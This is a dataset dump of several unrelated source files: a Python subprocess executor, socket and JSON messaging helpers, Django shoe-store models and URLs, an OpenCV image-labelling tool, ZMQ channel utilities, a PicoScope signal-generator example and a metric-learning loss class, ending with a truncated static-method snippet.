        if stdin == PIPE:
            self.stdin = InputPipeDispatcher(self.stdin, map=map, ignore_broken_pipe=True,
                close_when_done=close_when_done, maxdata=bufsize)
            self.stdin.obs_add(self._pipe_event)
    def cancel_timeout(self, logger=None):
        """Cancel the kill-on-timeout alarm, if one was set.

        Safe to call repeatedly; the alarm reference is always cleared.
        """
        if not self._alarmobj: return
        try:
            alarm.cancel(self._alarmobj)
        except Exception:
            # BUGFIX: this previously referenced an undefined name `child`
            # (child.pid), which raised NameError whenever the log branch ran.
            if logger: logger.debug("Error canceling child PID %d alarm" % self.pid, exc_info=1)
        finally:
            self._alarmobj = None
    def wait(self, logger=None):
        """Wait for the subprocess to exit, cancelling any pending timeout.

        NOTE(review): this overrides `Popen.wait(timeout=...)` with a
        different keyword signature — callers must not pass `timeout` here.
        """
        returncode = Popen.wait(self)
        self.cancel_timeout(logger=logger)
        return returncode
    @staticmethod
    def clear_signals(preexec_fn):
        """Wraps any preexec_fn in order to clear any signal handlers."""
        for s in range(1, signal.NSIG):
            try:
                # SIGKILL/SIGSTOP cannot be reassigned; reset everything else.
                if s not in [signal.SIGKILL, signal.SIGSTOP]: signal.signal(s, signal.SIG_DFL)
            except Exception:
                pass
        if callable(preexec_fn): preexec_fn()
    def kill(self):
        """Kill the child process with extreme prejudice."""
        try:
            if self.returncode is None: os.kill(self.pid, signal.SIGKILL)
        finally:
            self.cancel_timeout()
    def fetch_output(self, clear=True):
        """Fetch data from the subprocess output pipes.

        An output file not set to a pipe returns an empty string.
        """
        outdata = self.stdout.fetch_data(clear) if self.stdout is not None else ''
        errdata = self.stderr.fetch_data(clear) if self.stderr is not None else ''
        return outdata, errdata
    def output_closed(self):
        """Return true if both subprocess output pipes are closed.

        Can be used to detected the termination of the subprocess. An output
        file not sent to a pipe is ignored.
        """
        outread = self.stdout.readable() if self.stdout is not None else False
        errread = self.stderr.readable() if self.stderr is not None else False
        return not (outread or errread)
    def _pipe_event(self, observed, event):
        """Forward events on the pipes. The forwarded events contain the pipe
        event and the pipe itself as a two-element tuple."""
        self._obs_notify((event, observed))
class SubprocessExecutor(Executor):
    """Executes subprocesses, reading and writing data using `asyncore`.

    For each subprocess to be created, the generator must yield either the
    object to be passed to the `argv` argument of the `Popen` constructor,
    or a dictionary containing a required `argv` key, an optional `input` key
    containing a string to be written to `stdin` of the subprocess, and keys
    corresponding to the keyword parameters to `AsyncPopen` (the same keywords
    as the `child_spawn()` method).

    Once the subprocess has exited, the executor will call `send()` on the
    generator, passing a 4-element tuple containing the data read from
    `stdout` and `stderr`, the exit status returned by `Popen.poll()`, and the
    pid of the subprocess.  The generator can then yield the parameters for
    another subprocess.
    """

    def __init__(self, generator, exc_handler=print_exc, logger=None, **async_popen_keyw):
        """Initialize a subprocess executor.

        Additional keyword parameters to this constructor (usually passed
        through the decorator) will be passed to `AsyncPopen`.
        """
        Executor.__init__(self, generator, exc_handler)
        self._logger = logger
        # keyword defaults applied to every AsyncPopen this executor spawns
        self.__async_popen_dict = async_popen_keyw
        self.__current_child = None

    def _execute(self, logger=None, **async_popen_keyw):
        """Iterate the generator to completion (in the calling thread).

        The generator must yield the parameters for the first subprocess,
        which will be passed to `_spawn()`.

        Additional keyword parameters passed to this object when called will
        be passed to `AsyncPopen` (and override values passed to this object's
        constructor).
        """
        self.__async_popen_dict.update(async_popen_keyw)
        if logger is not None: self._logger = logger
        # Get the command to be executed from the generator
        # (self.next(): Python 2 iterator protocol, provided by Executor)
        self.__coerce_and_spawn(self.next())

    def _pipe_closed(self, observed, event):
        """Called when one of the output pipes (stdout or stderr) is closed.

        Once both are closed, declare the subprocess finished and call
        `_child_exit()`.
        """
        if observed.output_closed(): self._child_exit(observed)

    def _child_exit(self, child):
        """Called once `stdout` and `stderr` are both closed.

        Cleans up the subprocess, and then passes the subprocess results to
        the generator by calling `send()`. If the generator yields parameters
        for another subprocess, calls `_child_spawn()`.
        """
        self.__current_child = None
        # Close stdin for the child, so that it knows it won't be getting more data
        try:
            if child.stdin is not None: child.stdin.close()
        except:
            if self._logger: self._logger.debug("Error closing stdin for PID %d" % child.pid, exc_info=1)
        # Wait for the child if there's no signal handler
        if signal.getsignal(signal.SIGCHLD) == signal.SIG_DFL:
            try:
                # This will cancel the alarm
                returncode = child.wait(logger=self._logger)
            except:
                # NOTE(review): if wait() raises, `returncode` stays unbound and
                # the NameError below is swallowed by the broad try/except.
                if self._logger: self._logger.debug("Error waiting for child PID %d" % child.pid, exc_info=1)
                else: print_exc(file=sys.stderr)
        else:
            child.cancel_timeout(logger=self._logger)
            # This next will return None unless an exit status injector has been set up.
            returncode = child.poll()
        # Extract the result from the child process; and move on with the executor
        try:
            outdata, errdata = child.fetch_output()
            child_result = (outdata, errdata, returncode, child.pid)
            if self._logger: self._logger.debug("PID %d exited with code %s" % (child.pid, returncode))
            self.__coerce_and_spawn(self.send(child_result))
        except:
            # forward any failure (including StopIteration) to the generator machinery
            self.throw(*sys.exc_info())

    def close(self):
        """Kill the subprocess when closing the generator."""
        child = self.__current_child
        if child:
            try:
                child.kill()
            except:
                if self._logger: self._logger.exception("Error killing child PID %d" % child.pid)
                else: print_exc(file=sys.stderr)
            else:
                # only forget the child if the kill actually succeeded
                self.__current_child = None
        Executor.close(self)

    def __coerce_and_spawn(self, arg):
        """Coerce the argument into a call to `_child_spawn()`.

        A dict yield is expanded as keywords; anything else (e.g. a plain
        argv list) is passed as the `argv` parameter.
        """
        try:
            self._child_spawn(**arg)
        except:
            self._child_spawn(argv=arg)

    def _child_spawn(self, argv=None, input=None, **async_popen_keyw):
        """Create the subprocess and send the data to the input pipe. Called
        with the value(s) yielded by the generator.

        If a subprocess is to be spawned, the `argv` keyword must be supplied
        with a non-empty value. The value passed to the `input` keyword will
        be written to `stdin` of the subprocess.

        Additional keyword parameters passed to this method will
        be passed to `AsyncPopen` (and override values passed to this object's
        constructor).
        """
        if self.stopped(): return
        # Merge the keyword arguments together to pass to AsyncPopen
        async_popen_dict = self.__async_popen_dict.copy()
        async_popen_dict.update(async_popen_keyw)
        if input: async_popen_dict["stdin"] = PIPE
        # Create the subprocess itself
        if self._logger: self._logger.debug("Spawning subprocess %s" % argv)
        self.__current_child = AsyncPopen(argv, **async_popen_dict)
        if self._logger: self._logger.debug("Spawned subprocess %s with PID %d" % (argv, self.__current_child.pid))
        # Listen for both output pipes to close, and push the data to stdin
        self.__current_child.obs_add(self._pipe_closed, criteria=PipeDispatcher.PIPE_CLOSED)
        if input: self.__current_child.stdin.push_data(str(input))
if __name__ == '__main__':
    # Self-test / demo: spawns a cascade of child processes of this same script
    # (Python 2 syntax -- print statements, `print >>` redirection).

    def printdata(data, pid, channame):
        # dump one captured pipe's contents for a finished child
        print '[%d] %s %d bytes received: %r' % (pid, channame, len(data), data)

    execq = ExecutionQueue()

    @execute(execq, SubprocessExecutor)
    def spawn_child(argv, data, child, loops):
        """Spawn a cascade of subprocesses."""
        for lp in range(1, loops + 1):
            # yield the spawn parameters; receive (stdout, stderr, status, pid)
            (stdout, stderr, stat, pid) = yield {'argv': argv, 'input': '%s%s' % (data, '\n')}
            printdata(stdout, pid, 'stdout')
            printdata(stderr, pid, 'stderr')
            print "Loop %d child %d [%d] exited with status %s" % (lp, child, pid, stat)
            # feed the (reversed) output of this child to the next iteration
            if stat == 0 and data == stdout.rstrip()[::-1]: data = stdout[:-1]

    def run_child(pause, exitstat):
        """Run the subprocess code; a simple string inverter."""
        line = sys.stdin.readline().strip()
        sleep(pause / 2.0)
        # Write and close both pipes to show that it waits for exit anyway.
        print line[::-1]
        print >>sys.stderr, line
        sys.stdout.close()
        sys.stderr.close()
        sleep(pause / 2.0)
        sys.exit(exitstat)

    optparser = optparse.OptionParser(usage=__usage__, version=__version__)
    optparser.disable_interspersed_args()
    optparser.add_option('--loops', type='int', metavar='N', default=3,
                         help='Number of times to iterate each child [%default]')
    optparser.add_option('--children', type='int', metavar='N', default=3,
                         help='Number of children to spawn [%default]')
    optparser.add_option('--timeout', type='float', metavar='SECONDS', default=10.0,
                         help='Maximum time subprocess is allowed to run [%default sec]')
    optparser.add_option('--no-signal', dest='nosignal', action='store_true', default=False,
                         help='Ignore signals from child processes.')
    childopts = optparse.OptionGroup(optparser, 'Child options')
    childopts.add_option('--child', action='store_true', help=optparse.SUPPRESS_HELP)
    childopts.add_option('--pause', type='float', metavar='SECONDS', default=2.0,
                         help='Time to pause in the child process [%default sec]')
    childopts.add_option('--exitstat', type='int', metavar='STATUS', default=0,
                         help='Child exit status [%default]')
    optparser.add_option_group(childopts)
    (options, args) = optparser.parse_args()

    if options.child:
        # child mode (set by the parent via the injected --child flag)
        run_child(options.pause, options.exitstat)
    else:
        # Run the parent process code: start the first child and send data.
        if options.nosignal: signal.signal(signal.SIGCHLD, signal.SIG_IGN)
        sys.argv.insert(1, '--child')
        # Create and queue the children, and then loop asyncore
        # (`digits` presumably comes from the string module -- TODO confirm)
        data = ' '.join(args) if len(args) else digits
        for ch in range(1, options.children + 1):
            spawn_child(sys.argv, data, ch, options.loops)(timeout=options.timeout)
        loop()
        os.system('ps -ef')
| 2.6875 | 3 |
funs.py | sjTaylor/cmd_queue | 0 | 12767394 | <gh_stars>0
import struct
import sys
import select
import codes
import logging
import json
import os
def get_logger(name):
    """Configure root logging (timestamped format, DEBUG level) and return a named logger."""
    message_format = '%(asctime)s | %(name)s | %(levelname)s | %(message)s'
    logging.basicConfig(format=message_format,
                        datefmt='%m/%d/%Y %I:%M:%S %p',
                        level=logging.DEBUG)
    return logging.getLogger(name=name)
def list_from_file(filename):
    """Return the lines of *filename* as a list, each stripped of surrounding whitespace."""
    # Use a context manager so the handle is always closed
    # (the original opened the file and never closed it).
    with open(filename, 'r') as thefile:
        return [line.strip() for line in thefile]
class VarList:
    """A read-only clamped list: indexing past the end returns the last
    element, and indexing an empty list returns None."""

    def __init__(self, arr=None):
        # Fix the shared mutable-default pitfall of the original (`arr=[]`):
        # every no-arg instance would have shared one list object.
        self.vals = [] if arr is None else arr

    def __getitem__(self, index):
        if len(self.vals) == 0:  # was `is 0` -- identity comparison on an int
            return None
        if len(self.vals) <= index:
            # clamp out-of-range reads to the last element
            return self.vals[-1]
        return self.vals[index]
class ClientInterface:
    # Server-side proxy for one connected worker client: wraps the client's
    # socket and tracks which command (if any) it is currently running.

    def __init__(self, connection, id, config):
        self.con = connection      # connected client socket
        self.id = id               # numeric id assigned to this client
        self.cmdid = -1            # number of the command in flight (-1 = idle)
        self.error = False
        self.initialized = False
        self.config = config       # parsed options forwarded via initialize()

    def initialize(self):
        # push the run configuration (working dir, output prefix, ...) to the client
        send(self.con, encode(codes.send_config, (self.id, self.config)))

    def give_cmd(self, number, command):
        # dispatch command *number* to the client and remember it as in-flight
        self.cmdid = number
        send(self.con, encode(codes.send_cmd, (number, command)))

    def get_status(self):
        # not implemented -- placeholder
        pass

    def poll(self):
        # non-blocking check: True if the client socket has data to read
        a, b, c = select.select([self.con], [], [], 0)
        return len(a) > 0
def send(soc, msg):
    """Write all of *msg* to socket *soc* and return the number of bytes sent.

    Raises RuntimeError if the peer closes the connection mid-send.
    """
    total = len(msg)
    sent_so_far = 0
    while sent_so_far < total:
        n = soc.send(msg[sent_so_far:])
        if n == 0:
            raise RuntimeError("socket connection broken")
        sent_so_far += n
    return sent_so_far
def recv(sock):
    """Read one length-prefixed message from *sock*.

    The first 4 bytes are a native-order int giving the payload length; the
    returned bytes include that 4-byte header.  Raises RuntimeError if the
    connection drops before the full message arrives.
    """
    buf = b''
    expected = 4            # until the header arrives, we only need 4 bytes
    header_parsed = False
    while len(buf) < expected:
        chunk = sock.recv(expected - len(buf))
        if chunk == b'':
            raise RuntimeError("socket connection broken")
        buf += chunk
        if not header_parsed and len(buf) >= 4:
            # header complete: total size = payload length + 4 header bytes
            expected = struct.unpack('i', buf[:4])[0] + 4
            header_parsed = True
    return buf
def pad(num, padding):
    """Return *num* as a string left-padded with zeros to *padding* characters.

    Strings already longer than *padding* are returned unchanged.
    """
    return str(num).rjust(padding, '0')
def do_dir(prefix, padding, out_type, cmd_number):
    """Build the output path '<prefix>/<zero-padded cmd_number>-<out_type>.txt'."""
    stem = str(cmd_number).rjust(padding, '0') + '-' + out_type + '.txt'
    return os.path.join(prefix, stem)
def encode(code, data=None):
    """Serialize a protocol message as:
    [4-byte total length][4-byte message code][UTF-8 JSON payload].

    The JSON fields depend on the message code; *data* is a tuple whose
    layout is code-specific (see branches below).
    """
    ret = struct.pack('i', code)
    json_data = {}
    if code in [codes.send_config]:
        # data = (client_id, parsed-args namespace)
        args = data[1]
        json_data = {'client_id': data[0],
                     'working_directory': args.working_directory,
                     'output_prefix': args.output_directory,
                     'padding': args.num_digits,
                     'timeout': args.cmd_timeout}
    if code in [codes.send_cmd]:
        # data = (command number, command string)
        json_data['command'] = data[1]
        json_data['cmd_number'] = data[0]
    if code in [codes.finished]:
        # data = (command number, client id, return code)
        json_data['cmd_number'] = data[0]
        json_data['client_id'] = data[1]
        json_data['return_code'] = data[2]
    json_string = json.dumps(json_data)
    ret += bytearray(json_string.encode('utf-8'))
    # prepend the length of everything after the length field itself
    ret = struct.pack('i', len(ret)) + ret
    return ret
def decode(stuff):
    """Inverse of encode(): parse [length][code][JSON] bytes.

    Returns a (message code, decoded JSON payload) tuple; the leading
    4-byte length prefix is discarded.
    """
    body = stuff[4:]
    code = struct.unpack('i', body[:4])[0]
    payload = json.loads(body[4:].decode('utf-8'))
    return code, payload
def getinput():
    """Drain every line currently pending on stdin without blocking.

    Returns the list of lines read (possibly empty); uses select() with a
    zero timeout so it never waits for new input.
    """
    ret = []
    stuff = True
    while stuff:
        stuff = False
        # zero-timeout select: only reports stdin if data is already buffered
        kbinput, filler, fillertwo = select.select([sys.stdin], [], [], 0)
        for qq in kbinput:
            ret.append(qq.readline())
            stuff = True  # keep looping while stdin keeps having data
    return ret
| 2.609375 | 3 |
api/models.py | JavierBarajas552/drf_shoestore_frontend | 0 | 12767395 | <gh_stars>0
from django.db import models
# Create your models here.
class Manufacturer(models.Model):
    # A shoe maker; referenced by Shoe through a foreign key.
    name = models.CharField(max_length=100)
    website = models.URLField()
class ShoeType(models.Model):
    # A style category (e.g. sneaker, boot); referenced by Shoe.
    style = models.CharField(max_length=20)
class ShoeColor(models.Model):
    # Allowed colors as (stored value, display name) choices.
    # NOTE(review): 'YELLO'/'Yello' looks like a typo for "Yellow", and 'red' is
    # lowercase unlike the other display names -- fixing the stored value would
    # require a data migration, so it is only flagged here.
    color_name = models.CharField(max_length=10, choices=[('RED', 'red'), ('ORANGE', 'Orange'), ('YELLO', 'Yello'), ('GREEN', 'Green'), (
        'BLUE', 'Blue'), ('INDIGO', 'Indigo'), ('VIOLET', 'Violet'), ('WHITE', 'White'), ('BLACK', 'Black')])
class Shoe(models.Model):
    # One shoe product, tied to its manufacturer, color and type.
    size = models.IntegerField()
    brand_name = models.CharField(max_length=100)
    manufacturer = models.ForeignKey(Manufacturer, on_delete=models.CASCADE)
    color = models.ForeignKey(ShoeColor, on_delete=models.CASCADE)
    material = models.CharField(max_length=100)
    shoe_type = models.ForeignKey(ShoeType, on_delete=models.CASCADE)
    fasten_type = models.CharField(max_length=50)
| 2.375 | 2 |
labeller/rectangle-labeler-image.py | EveCharbie/rectangle-labelling | 0 | 12767396 | <reponame>EveCharbie/rectangle-labelling<filename>labeller/rectangle-labeler-image.py<gh_stars>0
import cv2
import numpy as np
from tqdm.notebook import tqdm
import pickle
def draw_points_and_lines():
    """Redraw the overlay: a filled circle for every active labelled point of
    the current frame, plus connecting lines between active neighbor points.

    Draws onto a fresh copy of the base image (module global `clone`).
    """
    global points_labels, circle_colors, circle_radius, iFrame, image, clone, active_points, rectangle_color
    # start from a clean copy so stale circles/lines from earlier clicks vanish
    clone = image.copy()
    for i in range(len(active_points)):
        if active_points[i] == True:
            # (x, y) of point i for the current frame, cast to pixel ints
            mouse_click_position = (int(points_labels[label_keys[i]][0, iFrame]), int(points_labels[label_keys[i]][1, iFrame]))
            cv2.circle(clone, mouse_click_position, circle_radius, color=circle_colors[i], thickness=-1)  # filled circle on clone
            for j in neighbors[i]:
                if active_points[j] == True:
                    # connect point i to each of its active neighbors
                    line_position = (int(points_labels[label_keys[j]][0, iFrame]), int(points_labels[label_keys[j]][1, iFrame]))
                    cv2.line(clone, mouse_click_position, line_position, rectangle_color, thickness=1)  # edge on clone
    return
def circle_positioning(event, x, y, flags, param):
    """OpenCV mouse callback: on left click, store the click coordinates as
    the position of the currently selected point and redraw the overlay.

    Assumes a point has been selected first (`current_click` is not None) --
    TODO confirm a click before any button press cannot occur.
    """
    global points_labels, current_click, iFrame
    if event == cv2.EVENT_LBUTTONDOWN:
        points_labels[label_keys[current_click]][:, iFrame] = np.array([x, y])
        draw_points_and_lines()
    return
def _select_point(index):
    """Make point *index* the active click target.

    Corner i and border i+4 form a mutually exclusive pair (indices 4 apart,
    modulo 8): selecting one deactivates the other, exactly as the original
    eight copy-pasted callbacks did.
    """
    global current_click
    current_click = index
    active_points[index] = True
    active_points[(index + 4) % 8] = False
    print('current_click : ', current_click)


# Button callbacks (wired to cv2.createButton below); each just selects its
# point index through the shared helper instead of duplicating the logic.

def left_front_corner_choice(*args):
    _select_point(0)
    return

def right_front_corner_choice(*args):
    _select_point(1)
    return

def right_back_corner_choice(*args):
    _select_point(2)
    return

def left_back_corner_choice(*args):
    _select_point(3)
    return

def left_front_border_choice(*args):
    _select_point(4)
    return

def right_front_border_choice(*args):
    _select_point(5)
    return

def right_back_border_choice(*args):
    _select_point(6)
    return

def left_back_border_choice(*args):
    _select_point(7)
    return
# Single-frame labelling session: one column per frame in each point array.
frames = np.array([0])

# Per-point (x, y) coordinates, one 2 x n_frames array per labelled point.
points_labels = {"left_front_corner": np.zeros((2, len(frames))),
                 "right_front_corner": np.zeros((2, len(frames))),
                 "right_back_corner": np.zeros((2, len(frames))),
                 "left_back_corner": np.zeros((2, len(frames))),
                 "left_front_border": np.zeros((2, len(frames))),
                 "right_front_border": np.zeros((2, len(frames))),
                 "right_back_border": np.zeros((2, len(frames))),
                 "left_back_border": np.zeros((2, len(frames)))}
# Index -> point-name mapping shared by all callbacks.
label_keys = [key for key in points_labels.keys()]
current_click = None                    # index of the point the next click positions
active_points = [False for i in range(8)]   # which points have been placed/selected
iFrame = 0                              # current frame index (only one frame here)
# For each point, the indices of the points it gets connected to by a line.
neighbors = [[1, 5, 3, 7],
             [0, 4, 2, 6],
             [1, 5, 3, 7],
             [0, 4, 2, 6],
             [1, 5, 3, 7],
             [0, 4, 2, 6],
             [1, 5, 3, 7],
             [0, 4, 2, 6],]
circle_radius = 5
rectangle_color = (100, 100, 100)
# Corners get distinct colors; borders are drawn in the rectangle color.
circle_colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), rectangle_color, rectangle_color, rectangle_color, rectangle_color]
Image_name = "Image_bidon.png"

############################### code beginning #######################################################################
global clone
# image = cv2.imread('../input/PI world v1 ps1_181.jpg')
# Load the pre-undistorted frame from the pickle produced by the pipeline.
# NOTE(review): this file handle is never closed -- consider a `with` block.
file = open(f"../output/PI world v1 ps1_181_undistorted_images.pkl", "rb")
image = pickle.load(file)
clone = image.copy()

# Build the window, one button per labellable point, and the click handler.
cv2.namedWindow(Image_name)
cv2.createButton("Left Front Corner (LFC)", left_front_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Front Corner (RFC)", right_front_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Back Corner (RBC)", right_back_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Back Corner (LBC)", left_back_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Front Border (LFB)", left_front_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Front Border (RFB)", right_front_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Back Border (RBB)", right_back_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Back Border (LBB)", left_back_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.setMouseCallback(Image_name, circle_positioning)

# Display loop: shows the (downscaled) annotated image until the process is
# killed.  NOTE(review): `key` is never checked, so there is no break
# condition -- confirm whether an exit key was intended here.
while True:
    ratio_image = 1.5
    width, height, rgb = np.shape(clone)
    small_image = cv2.resize(clone, (int(round(width / ratio_image)), int(round(height / ratio_image))))
    cv2.imshow(Image_name, small_image)
    key = cv2.waitKey(1) & 0xFF

cv2.destroyAllWindows()
| 2.34375 | 2 |
Geolocation/Data/Design2a/design2a_11k_test5/pilot.0000/rp_install/lib/python2.7/site-packages/radical/utils/zmq/utils.py | radical-experiments/iceberg_escience | 1 | 12767397 | <reponame>radical-experiments/iceberg_escience
import os
import msgpack
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def get_channel_url(ep_type, channel=None, url=None):
    '''
    For the given endpoint type, ensure that both channel name and endpoint URL
    are known.  If they are not, raise a ValueError exception.

    For a given URL, the channel is derived as path element of that URL
    (leading `/` is stripped).

    For a given channel name, the URL is searched in the process
    environment (under uppercase version of `<CHANNEL>_<EPTYPE>_URL`).  If not
    found, the method will look if a config file with the name `<channel>.cfg`
    exists, and if it has a top level entry named `<ep_type>` (lower case).

    Before returning the given or derived channel and url, the method will
    check if both data match (i.e. if the channel name is reflected in the URL)
    '''

    if not channel and not url:
        raise ValueError('need either channel name or URL')

    if not channel:
        # get channel from path element of URL
        # example:
        #   channel `foo`
        #   url     `pubsub://localhost:1234/foo`
        # BUG FIX: was `ru.Url(url.path)` -- `url` is a string here, so
        # `.path` had to be taken from the parsed Url, not the other way round.
        channel = os.path.basename(ru.Url(url).path)

    elif not url:
        # get url from environment (`FOO_PUB_URL`) or config file (`foo.cfg`)
        env_name = '%s_%s_URL' % (channel.upper(), ep_type.upper())
        cfg_name = './%s.cfg' % channel.lower()

        if env_name in os.environ:
            url = os.environ[env_name]

        elif os.path.exists(cfg_name):  # BUG FIX: `os.exists` does not exist
            with open(cfg_name, 'r') as fin:
                for line in fin.readlines():
                    if ':' not in line:
                        continue
                    # BUG FIX: split only on the first ':' -- the URL value
                    # itself contains ':' (scheme, port), which made the
                    # two-element unpack fail; also strip the newline.
                    _ep_type, _url = line.split(':', 1)
                    if _ep_type.strip().upper() == ep_type.upper():
                        url = _url.strip()
                        break

    # sanity checks
    if not url:
        raise ValueError('no URL for %s channel %s' % (channel, ep_type))

    if not channel:
        raise ValueError('no %s channel for URL %s' % (ep_type, url))

    if channel.lower() != ru.Url(url).path.lstrip('/').lower():
        raise ValueError('%s channel (%s) / url (%s) mismatch'
                        % (ep_type, channel, url))

    return channel, url
# ------------------------------------------------------------------------------
#
def log_bulk(log, bulk, token):
    """Debug-log the elements of *bulk*, each line prefixed with *token*."""

    # a file-like bulk is msgpack-encoded -- decode it first
    if hasattr(bulk, 'read'):
        bulk = msgpack.unpack(bulk)

    if not bulk:
        # nothing to report
        return

    # normalize to a list of elements
    if not isinstance(bulk, list):
        bulk = [bulk]

    # unwrap message envelopes of the form {'arg': payload}
    if isinstance(bulk[0], dict) and 'arg' in bulk[0]:
        bulk = [element['arg'] for element in bulk]

    if isinstance(bulk[0], dict) and 'uid' in bulk[0]:
        # entity dicts: log uid plus optional state
        for element in bulk:
            log.debug("%s: %s [%s]", token, element['uid'], element.get('state'))
    else:
        # anything else: log a truncated string form
        for element in bulk:
            log.debug("%s: %s", token, str(element)[0:32])
# ------------------------------------------------------------------------------
| 2.515625 | 3 |
ps2000aExamples/ps2000aSigGen.py | joe-jordan/picosdk-python-wrappers | 0 | 12767398 | <filename>ps2000aExamples/ps2000aSigGen.py<gh_stars>0
#
# Copyright (C) 2018 Pico Technology Ltd. See LICENSE file for terms.
#
# PS2000a SIGNAL GENERATOR EXAMPLE
# This example opens a 2000a driver device, sets up the singal generator to produce a sine wave, then a a square wave
# then perform a sweep of a square wave signal
import ctypes
from picosdk.ps2000a import ps2000a as ps
import time
from picosdk.functions import assert_pico_ok
# Gives the device a handle
# Collected driver-call statuses, keyed by operation name; chandle receives
# the device handle from the driver.
status = {}
chandle = ctypes.c_int16()

# Opens the device/s
status["openunit"] = ps.ps2000aOpenUnit(ctypes.byref(chandle), None)

try:
    assert_pico_ok(status["openunit"])
except:
    # Open failed -- recover from the two known power-source conditions,
    # re-raise anything else (the bare `raise` below).
    # powerstate becomes the status number of openunit
    powerstate = status["openunit"]
    # If powerstate is the same as 282 then it will run this if statement
    if powerstate == 282:
        # Changes the power input to "PICO_POWER_SUPPLY_NOT_CONNECTED"
        status["ChangePowerSource"] = ps.ps2000aChangePowerSource(chandle, 282)
    # If the powerstate is the same as 286 then it will run this if statement
    elif powerstate == 286:
        # Changes the power input to "PICO_USB3_0_DEVICE_NON_USB3_0_PORT"
        status["ChangePowerSource"] = ps.ps2000aChangePowerSource(chandle, 286)
    else:
        raise
    assert_pico_ok(status["ChangePowerSource"])

# Generates Sine signal with a 2V pkToPk with a 10KHz frequency
# handle = chandle
# offsetVoltage = 0
# pkToPk = 2000000
# waveType = ctypes.c_int16(0) = PS2000a_SINE
# startFrequency = 10000 Hz
# stopFrequency = 10000 Hz
# increment = 0
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
wavetype = ctypes.c_int16(0)
sweepType = ctypes.c_int32(0)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 10000, 0, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])

# pauses the script to show signal
time.sleep(10)

# Generates Square signal with a 2V pkToPk
# handle = chandle
# offsetVoltage = -1000000
# pkToPk = 1500000
# waveType = ctypes.c_int16(1) = PS2000a_Sqaure
# startFrequency = 10000 Hz
# stopFrequency = 10000 Hz
# increment = 0
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
# NOTE(review): the offset/pkToPk values in the comment block above do not
# match the call below (which passes 0 / 2000000) -- confirm which is intended.
wavetype = ctypes.c_int16(1)
sweepType = ctypes.c_int32(0)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 10000, 0, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])

# pauses the script to show signal
time.sleep(10)

# Generates square signal with an up/down sweep, from 10 kHz to 100 kHz in
# 5 kHz increments every 1 second.
# handle = chandle
# offsetVoltage = -1000000
# pkToPk = 1500000
# waveType = ctypes.c_int16(1) = PS2000a_Square
# startFrequency = 10000 Hz
# stopFrequency = 100000 Hz
# increment = 5
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
wavetype = ctypes.c_int16(1)
sweepType = ctypes.c_int32(2)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 100000, 5, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])

# pauses the script to show signal
time.sleep(36)

# Stops the scope
# Handle = chandle
status["stop"] = ps.ps2000aStop(chandle)
assert_pico_ok(status["stop"])

# Closes the unit
# Handle = chandle
status["close"] = ps.ps2000aCloseUnit(chandle)
assert_pico_ok(status["close"])

# Displays the status returns
print(status)
src/pytorch_metric_learning/losses/signal_to_noise_ratio_losses.py | wconnell/pytorch-metric-learning | 1 | 12767399 | <reponame>wconnell/pytorch-metric-learning<gh_stars>1-10
from ..utils import common_functions as c_f
from .contrastive_loss import ContrastiveLoss
from ..distances import SNRDistance
class SignalToNoiseRatioContrastiveLoss(ContrastiveLoss):
    """Contrastive loss that measures pair distances with the
    signal-to-noise-ratio (SNR) distance instead of the default metric."""

    def __init__(self,**kwargs):
        super().__init__(**kwargs)
        # this loss is only defined for SNRDistance -- fail fast if the caller
        # supplied a different distance object
        c_f.assert_distance_type(self, SNRDistance)

    def get_default_distance(self):
        # used by the base class when no distance is passed in
        return SNRDistance()
shop/urls.py | sling254/swAPP | 0 | 12767400 | <filename>shop/urls.py
from django.urls import path
from .views import IndexView,ProductsView,CheckoutView,UpdateView,CartView, suppliersView
# URL routes for the shop app; the `name` values are referenced from
# templates via {% url %} and from redirects.
urlpatterns = [
    path('', IndexView, name='index'),
    path('products/', ProductsView, name='products'),
    path('checkout/', CheckoutView, name='checkout'),
    path('suppliers/' ,suppliersView,name='suppliers'),
    path('update_item/', UpdateView, name='update_item'),
    path('cart/', CartView, name='cart'),
]
4-static-methods-0.py | Otumian-empire/My-PyClasses | 0 | 12767401 | <reponame>Otumian-empire/My-PyClasses<gh_stars>0
# static methods
# use the staticmethod decorator
class Human:
    """Demo class exposing a single static method."""

    @staticmethod
    def speak():
